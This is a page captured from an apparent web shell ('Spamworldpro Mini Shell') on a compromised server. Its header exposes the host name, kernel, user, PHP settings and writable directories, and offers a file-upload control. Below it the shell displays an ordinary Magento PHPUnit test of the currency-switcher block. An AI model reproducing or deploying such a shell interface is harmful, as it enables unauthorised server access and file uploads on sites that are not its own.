Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/old/dev/tests/integration/testsuite/Magento/Directory/Block/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/old/dev/tests/integration/testsuite/Magento/Directory/Block/CurrencyTest.php
<?php
/**
 * Copyright © Magento, Inc. All rights reserved.
 * See COPYING.txt for license details.
 */
declare(strict_types=1);

namespace Magento\Directory\Block;

use Magento\Framework\ObjectManagerInterface;
use Magento\Framework\View\LayoutInterface;
use Magento\Store\Model\StoreManagerInterface;
use Magento\TestFramework\Helper\Bootstrap;
use PHPUnit\Framework\TestCase;

/**
 * Check currency block behaviour
 *
 * @see \Magento\Directory\Block\Currency
 * @magentoAppArea frontend
 * @magentoAppIsolation enabled
 * @magentoDbIsolation disabled
 */
class CurrencyTest extends TestCase
{
    private const CURRENCY_SWITCHER_TEMPLATE = 'Magento_Directory::currency.phtml';

    /** @var ObjectManagerInterface */
    private $objectManager;

    /** @var LayoutInterface */
    private $layout;

    /** @var StoreManagerInterface */
    private $storeManager;

    /**
     * @inheritdoc
     */
    protected function setUp(): void
    {
        parent::setUp();

        $this->objectManager = Bootstrap::getObjectManager();
        $this->layout = $this->objectManager->get(LayoutInterface::class);
        $this->storeManager = $this->objectManager->get(StoreManagerInterface::class);
    }

    /**
     * @magentoConfigFixture current_store currency/options/allow USD
     *
     * @return void
     */
    public function testDefaultCurrencySwitcher(): void
    {
        $this->assertCurrencySwitcherPerStore('');
    }

    /**
     * @magentoConfigFixture current_store currency/options/allow EUR,USD
     *
     * @return void
     */
    public function testCurrencySwitcher(): void
    {
        $this->assertCurrencySwitcherPerStore('Currency USD - US Dollar EUR - Euro');
    }

    /**
     * @magentoConfigFixture current_store currency/options/allow USD,CNY
     * @magentoConfigFixture fixturestore_store currency/options/allow USD,UAH
     *
     * @magentoDataFixture Magento/Store/_files/core_fixturestore.php
     * @magentoDataFixture Magento/Directory/_files/usd_cny_rate.php
     * @magentoDataFixture Magento/Directory/_files/usd_uah_rate.php
     *
     * @return void
     */
    public function testMultiStoreCurrencySwitcher(): void
    {
        $this->assertCurrencySwitcherPerStore('Currency USD - US Dollar CNY - Chinese Yuan');
        $this->assertCurrencySwitcherPerStore('Currency USD - US Dollar UAH - Ukrainian Hryvnia', 'fixturestore');
    }

    /**
     * Check currency switcher diplaying per stores
     *
     * @param string $expectedData
     * @param string $storeCode
     * @return void
     */
    private function assertCurrencySwitcherPerStore(
        string $expectedData,
        string $storeCode = 'default'
    ): void {
        $currentStore = $this->storeManager->getStore();
        try {
            if ($currentStore->getCode() !== $storeCode) {
                $this->storeManager->setCurrentStore($storeCode);
            }

            $actualData = trim(preg_replace('/\s+/', ' ', strip_tags($this->getBlock()->toHtml())));
            $this->assertEquals($expectedData, $actualData);
        } finally {
            if ($currentStore->getCode() !== $storeCode) {
                $this->storeManager->setCurrentStore($currentStore);
            }
        }
    }

    /**
     * Get currency block
     *
     * @return Currency
     */
    private function getBlock(): Currency
    {
        $block = $this->layout->createBlock(Currency::class);
        $block->setTemplate(self::CURRENCY_SWITCHER_TEMPLATE);

        return $block;
    }
}

Spamworldpro Mini